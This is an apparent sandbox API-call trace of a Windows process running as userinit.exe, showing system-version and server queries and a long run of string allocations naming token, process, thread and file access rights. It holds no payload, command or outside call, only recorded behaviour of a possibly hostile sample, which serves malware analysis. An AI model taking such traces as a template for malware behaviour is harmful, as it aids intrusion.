[0159.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0159.887] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0159.888] GetVersionExA (in: lpVersionInformation=0x24f2b4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x630000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xdc\xf2\x24") | out: lpVersionInformation=0x24f2b4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0159.888] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0159.888] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0159.941] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0159.941] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x24f338 | out: bufptr=0x24f338) returned 0x0
[0159.998] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0159.998] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0159.998] NetApiBufferFree (Buffer=0x651d00) returned 0x0
[0159.999] SetErrorMode (uMode=0x8000) returned 0x1
[0159.999] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0159.999] SetErrorMode (uMode=0x1) returned 0x8000
[0159.999] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.000] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.002] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.003] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.005] SysReAllocStringLen (in: pbstr=0x29cec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29cec40*="DELETE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cec30*="READ_CONTROL") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29cec20*="WRITE_OWNER") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cec10*="WRITE_DAC") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x29cec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x29cebf0*="FILE_READ_ATTRIBUTES") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x29cebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x29cebd0*="FILE_WRITE_DATA") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x29cebc0*="FILE_READ_DATA") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x29cebb0*="FILE_ALL_ACCESS") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ceba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ceb90*="STANDARD_RIGHTS_WRITE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ceb80*="STANDARD_RIGHTS_READ") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ceb70*="STANDARD_RIGHTS_ALL") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ceb50*="DELETE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ceb40*="READ_CONTROL") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ceb30*="WRITE_OWNER") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ceb20*="WRITE_DAC") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x29ceb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x29ceb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x29ceaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x29ceae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29cead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x29cead0*="TOKEN_QUERY_SOURCE") returned 1
[0160.005] SysReAllocStringLen (in: pbstr=0x29ceac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x29ceac0*="TOKEN_QUERY") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ceab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x29ceab0*="TOKEN_IMPERSONATE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ceaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x29ceaa0*="TOKEN_DUPLICATE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x29cea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x29cea80*="TOKEN_ALL_ACCESS") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29cea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29cea60*="STANDARD_RIGHTS_WRITE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29cea50*="STANDARD_RIGHTS_READ") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29cea40*="STANDARD_RIGHTS_ALL") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29cea30*="DELETE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29cea20*="READ_CONTROL") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29cea10*="WRITE_OWNER") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29cea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29cea00*="WRITE_DAC") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x29ce9f0*="TIMER_MODIFY_STATE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x29ce9e0*="TIMER_QUERY_STATE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x29ce9d0*="TIMER_ALL_ACCESS") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce9a0*="STANDARD_RIGHTS_READ") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce990*="STANDARD_RIGHTS_ALL") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce980*="DELETE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce970*="READ_CONTROL") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce960*="WRITE_OWNER") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce950*="WRITE_DAC") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x29ce940*="SECTION_EXTEND_SIZE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x29ce930*="FILE_MAP_READ") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x29ce920*="FILE_MAP_WRITE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x29ce910*="FILE_MAP_COPY") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x29ce900*="FILE_MAP_ALL_ACCESS") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce8d0*="STANDARD_RIGHTS_READ") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce8c0*="STANDARD_RIGHTS_ALL") returned 1
[0160.006] SysReAllocStringLen (in: pbstr=0x29ce8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce8b0*="DELETE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce8a0*="READ_CONTROL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce890*="WRITE_OWNER") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce880*="WRITE_DAC") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x29ce870*="MUTEX_MODIFY_STATE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x29ce860*="MUTEX_ALL_ACCESS") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce840*="STANDARD_RIGHTS_WRITE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce830*="STANDARD_RIGHTS_READ") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce820*="STANDARD_RIGHTS_ALL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce810*="DELETE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce800*="READ_CONTROL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce7f0*="WRITE_OWNER") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce7e0*="WRITE_DAC") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x29ce7d0*="EVENT_MODIFY_STATE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x29ce7c0*="EVENT_ALL_ACCESS") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce790*="STANDARD_RIGHTS_READ") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce780*="STANDARD_RIGHTS_ALL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce770*="DELETE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce760*="READ_CONTROL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce750*="WRITE_OWNER") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce740*="WRITE_DAC") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x29ce730*="SEMAPHORE_MODIFY_STATE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x29ce720*="SEMAPHORE_ALL_ACCESS") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce700*="STANDARD_RIGHTS_WRITE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce6f0*="STANDARD_RIGHTS_READ") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce6e0*="STANDARD_RIGHTS_ALL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce6d0*="DELETE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce6c0*="READ_CONTROL") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce6b0*="WRITE_OWNER") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce6a0*="WRITE_DAC") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x29ce690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x29ce680*="JOB_OBJECT_TERMINATE") returned 1
[0160.007] SysReAllocStringLen (in: pbstr=0x29ce670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x29ce670*="JOB_OBJECT_QUERY") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x29ce660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x29ce650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x29ce640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce620*="STANDARD_RIGHTS_WRITE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce610*="STANDARD_RIGHTS_READ") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce600*="STANDARD_RIGHTS_ALL") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce5f0*="DELETE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce5e0*="READ_CONTROL") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce5d0*="WRITE_OWNER") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce5c0*="WRITE_DAC") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x29ce5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x29ce5a0*="THREAD_IMPERSONATE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x29ce590*="THREAD_SET_THREAD_TOKEN") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x29ce580*="THREAD_QUERY_INFORMATION") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x29ce570*="THREAD_SET_INFORMATION") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x29ce560*="THREAD_SET_CONTEXT") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x29ce550*="THREAD_GET_CONTEXT") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x29ce540*="THREAD_SUSPEND_RESUME") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x29ce530*="THREAD_TERMINATE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x29ce520*="THREAD_ALL_ACCESS") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce500*="STANDARD_RIGHTS_WRITE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce4f0*="STANDARD_RIGHTS_READ") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce4e0*="STANDARD_RIGHTS_ALL") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce4d0*="DELETE") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce4c0*="READ_CONTROL") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce4b0*="WRITE_OWNER") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce4a0*="WRITE_DAC") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x29ce490*="PROCESS_QUERY_INFORMATION") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x29ce480*="PROCESS_SET_INFORMATION") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x29ce470*="PROCESS_SET_QUOTA") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x29ce460*="PROCESS_CREATE_PROCESS") returned 1
[0160.008] SysReAllocStringLen (in: pbstr=0x29ce450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x29ce450*="PROCESS_DUP_HANDLE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x29ce440*="PROCESS_VM_WRITE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x29ce430*="PROCESS_VM_READ") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x29ce420*="PROCESS_VM_OPERATION") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x29ce410*="PROCESS_SET_SESSIONID") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x29ce400*="PROCESS_CREATE_THREAD") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x29ce3f0*="PROCESS_TERMINATE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x29ce3e0*="PROCESS_ALL_ACCESS") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ce3b0*="STANDARD_RIGHTS_READ") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29ce3a0*="STANDARD_RIGHTS_ALL") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ce390*="DELETE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ce380*="READ_CONTROL") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ce370*="WRITE_OWNER") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ce360*="WRITE_DAC") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x29ce350*="PERM_FILE_CREATE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x29ce340*="PERM_FILE_WRITE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x29ce330*="PERM_FILE_READ") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ce320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.009] SysReAllocStringLen (in: pbstr=0x29ce310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ce310*="STANDARD_RIGHTS_WRITE") returned 1
